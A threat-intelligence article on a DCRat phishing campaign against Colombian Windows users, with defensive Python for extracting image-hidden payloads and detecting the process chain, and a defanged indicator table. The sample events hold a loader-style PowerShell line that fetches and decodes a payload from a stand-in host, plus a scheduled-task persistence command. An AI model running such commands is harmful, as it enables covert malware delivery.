A newly uncovered cyber campaign has been deploying the modular DCRat Remote Access Trojan (RAT) to target Microsoft Windows users, predominantly in Colombia, through highly convincing phishing emails.
The attack, attributed to a threat actor impersonating a Colombian government agency, leverages a blend of advanced evasion techniques including steganography, base64 encoding, and multi-stage payload delivery to stealthily compromise systems and bypass security controls.
Layered Multistage Attack Chain
The campaign begins with a seemingly official email containing a password-protected ZIP archive, designed to lure victims into executing its contents.
Inside is a batch file that starts the infection by downloading a heavily obfuscated VBS script from a paste site (paste[.]ee, per the indicators below).

This script, once deobfuscated, executes PowerShell code that retrieves an image file and extracts the malicious base64 text embedded in it, a simple form of steganography: the payload travels inside what looks like an ordinary picture. Decoding that text yields a .NET executable, the DCRat RAT, which the PowerShell stage then runs.
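To make the image stage concrete, here is an added analyst-side example (not Fortinet's code and not the campaign's loader) that recovers a base64-encoded executable hidden in an image file. It assumes the payload sits as plain base64 text after the JPEG end-of-image marker (FF D9); the sample image, the fake PE and the `<<BASE64_START>>` / `<<BASE64_END>>` markers are constructed for the demonstration, and the scanner deliberately does not rely on the markers, so it also works when a loader uses different ones.

```python
import base64
import binascii
import hashlib
import re
import struct

# Constructed sample, NOT the campaign's image: a minimal JPEG header/footer
# followed by a base64-encoded fake PE. The marker strings are an assumption;
# the scanner below only looks for any long base64 run after the JPEG EOI.
FAKE_PE = (
    b"MZ" + b"\x90" * 58            # DOS header up to e_lfanew at offset 0x3C
    + struct.pack("<I", 0x80)       # e_lfanew -> PE header lives at 0x80
    + b"\x00" * 64                  # padding up to offset 0x80
    + b"PE\x00\x00" + b"\x00" * 32  # PE signature plus a little filler
)
SAMPLE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64 + b"\xff\xd9"  # SOI .. EOI
    + b"<<BASE64_START>>" + base64.b64encode(FAKE_PE) + b"<<BASE64_END>>"
)


def looks_like_pe(data: bytes) -> bool:
    """True if data has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def candidate_blobs(image_bytes: bytes, min_len: int = 64):
    """Yield base64-looking runs after the last JPEG EOI marker.

    If no EOI is present (PNG, or a file that is not really an image) the whole
    buffer is scanned. Whitespace is stripped first because some loaders wrap
    the base64 text into lines.
    """
    eoi = image_bytes.rfind(b"\xff\xd9")
    tail = image_bytes[eoi + 2:] if eoi != -1 else image_bytes
    tail = re.sub(rb"\s+", b"", tail)
    run = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    for m in run.finditer(tail):
        yield m.group(0)


def extract_payloads(image_bytes: bytes, min_len: int = 64) -> list:
    """Decode every candidate run and keep those that decode to a PE image."""
    found = []
    for blob in candidate_blobs(image_bytes, min_len):
        try:
            data = base64.b64decode(blob + b"=" * (-len(blob) % 4), validate=True)
        except binascii.Error:
            continue  # not valid base64 after all (e.g. a long hex string)
        if looks_like_pe(data):
            found.append(data)
    return found


if __name__ == "__main__":
    for payload in extract_payloads(SAMPLE_IMAGE):
        print(len(payload), "bytes, SHA-256", hashlib.sha256(payload).hexdigest())
```

On a real sample, hash each recovered payload and compare it with the SHA-256 indicators at the end of this article; a hit on the EXE hash confirms the image is the carrier for the DCRat binary.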
Technical analysis shows that DCRat’s architecture is modular, allowing attackers to dynamically load plugins to tailor its behavior for activities such as data theft, surveillance, and persistence.
Once active, the malware provides attackers with comprehensive remote control over the infected system.
Capabilities include command execution, file and process management, screenshot capture, credential harvesting, and keylogging.
System manipulation functions further allow the RAT to reboot, shut down, and log off users or create new accounts on the system.

A key part of DCRat’s stealth is its set of anti-analysis features. The RAT attempts to detect virtualized (sandbox) environments, disables key Windows administrative tools, and runs an AMSI (Antimalware Scan Interface) bypass routine so that the script content it executes is not handed to endpoint security software for scanning.
Persistence is achieved through a scheduled task or a registry modification, chosen according to the privilege level the malware runs with, ensuring that it survives reboots and user logins.
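The chain described above (batch file, script host, PowerShell fetching an image and decoding base64, then a persistence mechanism) is the kind of parent/child process pattern a detection engineer would hunt for. The following is an added example, not part of Fortinet's report, that runs such rules over constructed process-creation events in a Sysmon-like shape. The events, paths, hostname `archive.example` and command lines are assumptions built for the demonstration, not artifacts from the campaign.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the
# fields the rules need). These are NOT logs from the campaign; paths and
# command lines are illustrative assumptions.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\archivo\documento.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\stage2.vbs"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell.exe -w hidden -ep bypass -c \"$i=(New-Object Net.WebClient)"
                 ".DownloadString('https://archive.example/new_image.jpg');"
                 "[Convert]::FromBase64String($i.Split('<<')[1])\"")},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Updater /sc onlogon /tr C:\Users\u\AppData\Roaming\svc.exe /f"},
    {"pid": 600, "ppid": 100,  # benign PowerShell started by the user: must not alert
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Image-carried base64 loader hints: base64 decoding plus an image URL, or the
# hosting services named in this campaign's indicators.
LOADER_HINTS = re.compile(r"FromBase64String|\.(jpe?g|png|bmp)\b|paste\.ee|archive\.org", re.I)
# Persistence via a scheduled task or a Run key (the two mechanisms the RAT uses).
PERSISTENCE = re.compile(
    r"schtasks(\.exe)?\s+/create|reg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event: dict, by_pid: dict, limit: int = 10) -> list:
    """Image basenames of the parent, grandparent, ... (nearest first)."""
    chain, parent = [], by_pid.get(event["ppid"])
    while parent and len(chain) < limit:
        chain.append(basename(parent["image"]))
        parent = by_pid.get(parent["ppid"])
    return chain


def detect(events: list) -> list:
    """Return (pid, reason) tuples for events matching the DCRat-style chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, parents = basename(e["image"]), ancestry(e, by_pid)
        if name in SCRIPT_HOSTS and parents[:1] == ["cmd.exe"]:
            alerts.append((e["pid"], "script host launched from cmd.exe (batch stage)"))
        if name in SHELLS and (set(parents[:1]) & SCRIPT_HOSTS or LOADER_HINTS.search(e["cmdline"])):
            alerts.append((e["pid"], "PowerShell under a script host / image-to-base64 loader pattern"))
        if PERSISTENCE.search(e["cmdline"]) and set(parents) & (SHELLS | SCRIPT_HOSTS):
            alerts.append((e["pid"], "persistence created from a scripted process chain"))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

The rules are intentionally written against the process tree rather than file hashes, so they keep firing when the ZIP, BAT, VBS and EXE are recompiled or re-obfuscated for the next wave; the hashes below are still worth blocking, but they describe this sample, not the technique.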
Severe Impact
The implications of a successful DCRat infection are significant. Attackers gain persistent access to compromised Windows devices, enabling large-scale theft of sensitive data such as login credentials, documents, and browser information.
The malware can also manipulate the victim’s system environment, disrupt operations, and potentially facilitate further lateral movement within an organization’s network.
Fortinet, whose researchers analyzed the campaign, reports that its security products (FortiMail, FortiGate, FortiClient, and FortiEDR) detect and block all stages of this malware, thanks to up-to-date threat intelligence and dynamic analysis engines.
The vendor also advises organizations to leverage advanced email security, user awareness training, and reputable threat intelligence services to defend against sophisticated threats like this.
Indicators of Compromise
| Type | Indicator |
|---|---|
| URL | hxxp[:]//paste[.]ee/d/jYHEqBJ3/0 |
| URL | hxxps[:]//paste[.]ee/d/oAqRiS3g |
| URL | hxxps[:]//ia601205[.]us[.]archive[.]org/26/items/new_image_20250430/new_image[.]jpg |
| SHA-256 (ZIP) | db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb837189c6551010a6f828590 |
| SHA-256 (BAT) | 34b8040d3dad4bd9f34738fbc3363fcda819ac479db8497fb857865cee77ad89 |
| SHA-256 (VBS) | b0f3c7ea17875b5e1545678b3878ce268ff4bde718b66254ce01b0bb864801b8 |
| SHA-256 (EXE) | 77a22e30e4cc900379fd4b04c707d2dfd174858c8e1ee3f1cbecd4ece1fab3fe |
| C2 | 176[.]65[.]144[.]19[:]8848 |